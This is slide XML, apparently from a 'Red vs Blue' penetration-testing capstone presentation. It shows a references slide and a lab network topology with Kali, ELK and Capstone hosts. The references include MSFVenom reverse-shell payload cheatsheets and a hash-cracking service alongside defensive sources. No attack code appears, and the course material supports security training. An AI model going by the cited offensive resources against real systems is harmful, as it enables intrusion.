                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> Vulnerabilities National Institute of Standards and Technology</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings 2" panose="05020102010507070707" pitchFamily="18" charset="2"/>
              <a:buChar char="m"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>CVE-2021-31783 Detail</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>NIST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> Vulnerabilities National Institute of Standards and Technology</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings 2" panose="05020102010507070707" pitchFamily="18" charset="2"/>
              <a:buChar char="n"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>CWE-548: Exposure of Information Through Directory Listing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>CWE Common Weakness Enumeration</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings 2" panose="05020102010507070707" pitchFamily="18" charset="2"/>
              <a:buChar char="n"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:hlinkClick r:id="rId9"/>
              </a:rPr>
              <a:t>CVE-2019-5437 Detail</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>NIST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> Vulnerabilities National Institute of Standards and Technology</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings 2" panose="05020102010507070707" pitchFamily="18" charset="2"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:hlinkClick r:id="rId10"/>
              </a:rPr>
              <a:t>CVE-2020-24227 Detail</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>NIST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> Vulnerabilities National Institute of Standards and Technology</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings 2" panose="05020102010507070707" pitchFamily="18" charset="2"/>
              <a:buChar char="p"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:hlinkClick r:id="rId11"/>
              </a:rPr>
              <a:t>HOW SECURE IS MY PASSWORD?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:hlinkClick r:id="rId12"/>
              </a:rPr>
              <a:t>Security.org</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings 2" panose="05020102010507070707" pitchFamily="18" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Kevin Beaver: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:hlinkClick r:id="rId13"/>
              </a:rPr>
              <a:t>Prevent Network Hacking with Port Scanners</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, Dummies A Wiley Brand</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings 2" panose="05020102010507070707" pitchFamily="18" charset="2"/>
              <a:buChar char="r"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:hlinkClick r:id="rId14"/>
              </a:rPr>
              <a:t>How to protect against port scanners?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, on Unix &amp; Linux (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:hlinkClick r:id="rId15"/>
              </a:rPr>
              <a:t>Stack Exchange</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings 2" panose="05020102010507070707" pitchFamily="18" charset="2"/>
              <a:buChar char="s"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Author: Esheridan, Contributor(s): KirstenS, Paul McMillan, Raesene, Adedov, Dinis.Cruz, JoE, Daniel Waller, kingthorin, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:hlinkClick r:id="rId16"/>
              </a:rPr>
              <a:t>Blocking Brute Force Attacks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:hlinkClick r:id="rId17"/>
              </a:rPr>
              <a:t>OWASP The Open Web Application Security Project®</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings 2" panose="05020102010507070707" pitchFamily="18" charset="2"/>
              <a:buChar char="u"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:hlinkClick r:id="rId18"/>
              </a:rPr>
              <a:t>Crackstation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, Free Password Hash Cracker</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings 2" panose="05020102010507070707" pitchFamily="18" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:hlinkClick r:id="rId19"/>
              </a:rPr>
              <a:t>How to block all ports except 80,443 with iptables?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, on Unix &amp; Linux (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:hlinkClick r:id="rId15"/>
              </a:rPr>
              <a:t>Stack Exchange</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings 2" panose="05020102010507070707" pitchFamily="18" charset="2"/>
              <a:buChar char="w"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:hlinkClick r:id="rId20"/>
              </a:rPr>
              <a:t>MSFVenom Reverse Shell Payload Cheatsheet (with &amp; without Meterpreter)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, Posted on January 25, 2020 by Harley in Tips &amp; Tricks, on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:hlinkClick r:id="rId21"/>
              </a:rPr>
              <a:t>INFINITE LOGINS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings 2" panose="05020102010507070707" pitchFamily="18" charset="2"/>
              <a:buChar char="x"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>frizb, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:hlinkClick r:id="rId22"/>
              </a:rPr>
              <a:t>MSFVenom Cheatsheet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:hlinkClick r:id="rId23"/>
              </a:rPr>
              <a:t>GitHub</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, on Apr 25, 2019</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings 2" panose="05020102010507070707" pitchFamily="18" charset="2"/>
              <a:buChar char="y"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Aleksandar Matic, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:hlinkClick r:id="rId24"/>
              </a:rPr>
              <a:t>Review and Allowlist CDN / WAF IP Blocks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, Updated: July 16, 2021 04:04, on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:hlinkClick r:id="rId25"/>
              </a:rPr>
              <a:t>StackPath</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings 2" panose="05020102010507070707" pitchFamily="18" charset="2"/>
              <a:buChar char="z"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:hlinkClick r:id="rId26"/>
              </a:rPr>
              <a:t>Reverse Shell Exploit Prevention</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="139700" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Wingdings 2" panose="05020102010507070707" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t>{</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:hlinkClick r:id="rId27"/>
              </a:rPr>
              <a:t>Dangers of storing and sharing passwords in plaintext</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, March 6, 2020, on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:hlinkClick r:id="rId28"/>
              </a:rPr>
              <a:t>PassCamp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0">
              <a:latin typeface="Wingdings 2" panose="05020102010507070707" pitchFamily="18" charset="2"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="6" name="Group 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A26423FD-94D8-46FF-AC4A-2D722C9C49A7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2177833" y="127134"/>
            <a:ext cx="695400" cy="521227"/>
            <a:chOff x="5285468" y="706960"/>
            <a:chExt cx="695400" cy="737003"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="Google Shape;1038;p55">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F3AB32DE-F902-48F1-846A-91864925DE30}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5285468" y="706960"/>
              <a:ext cx="695400" cy="6213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mn-lt"/>
                  <a:ea typeface="STFangsong" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                  <a:cs typeface="Roboto Thin"/>
                  <a:sym typeface="Roboto Thin"/>
                </a:rPr>
                <a:t>R</a:t>
              </a:r>
              <a:endParaRPr sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="STFangsong" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Roboto Thin"/>
                <a:sym typeface="Roboto Thin"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="Google Shape;1039;p55">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{45B2E1F0-BD0B-45EE-86D9-187DDC895B60}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="5463006" y="1255338"/>
              <a:ext cx="340325" cy="188625"/>
            </a:xfrm>
            <a:prstGeom prst="flowChartExtra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6081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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1" dirty="0"/>
              <a:t>192.168.1.0/24</a:t>
            </a:r>
            <a:endParaRPr b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>Netmask: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1" dirty="0"/>
              <a:t>255.255.255.0</a:t>
            </a:r>
            <a:endParaRPr b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>Gateway: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1" dirty="0"/>
              <a:t>10.0.0.1</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1" dirty="0"/>
              <a:t>192.168.1.1</a:t>
            </a:r>
            <a:endParaRPr b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>OS: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1" dirty="0"/>
              <a:t>Windows</a:t>
            </a:r>
            <a:endParaRPr b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>Hostname: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1" dirty="0"/>
              <a:t>Red vs Blue – ML-REFVM-684427</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1" dirty="0"/>
              <a:t>192.168.1.90</a:t>
            </a:r>
            <a:endParaRPr b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>OS: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1" dirty="0"/>
              <a:t>Kali GNU</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="900" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="900" b="1" dirty="0"/>
              <a:t>Linux 5.4.0)</a:t>
            </a:r>
            <a:endParaRPr sz="900" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>Hostname: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1" dirty="0"/>
              <a:t>Kali</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1" dirty="0"/>
              <a:t>192.168.1.100</a:t>
            </a:r>
            <a:endParaRPr b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>OS: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1" dirty="0"/>
              <a:t>Ubuntu 18.04.1 LTS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>Hostname: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1" dirty="0"/>
              <a:t>ELK</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>192.168.1.105</a:t>
            </a:r>
            <a:endParaRPr b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>OS: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Ubuntu 18.04.1 LTS</a:t>
            </a:r>
            <a:endParaRPr b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>Hostname: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Capstone</a:t>
            </a:r>
            <a:endParaRPr b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>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Network Topology</a:t>
            </a:r>
            <a:endParaRPr dirty="0">
              <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{80ACCD74-4645-48B5-A0DA-6E1D37200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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="7" name="Group 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F0EAF68D-C8D5-4302-8806-5BF02FDA2975}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3591364" y="121146"/>
            <a:ext cx="622827" cy="531860"/>
            <a:chOff x="457225" y="696326"/>
            <a:chExt cx="690207" cy="747637"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="Google Shape;1029;p55">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
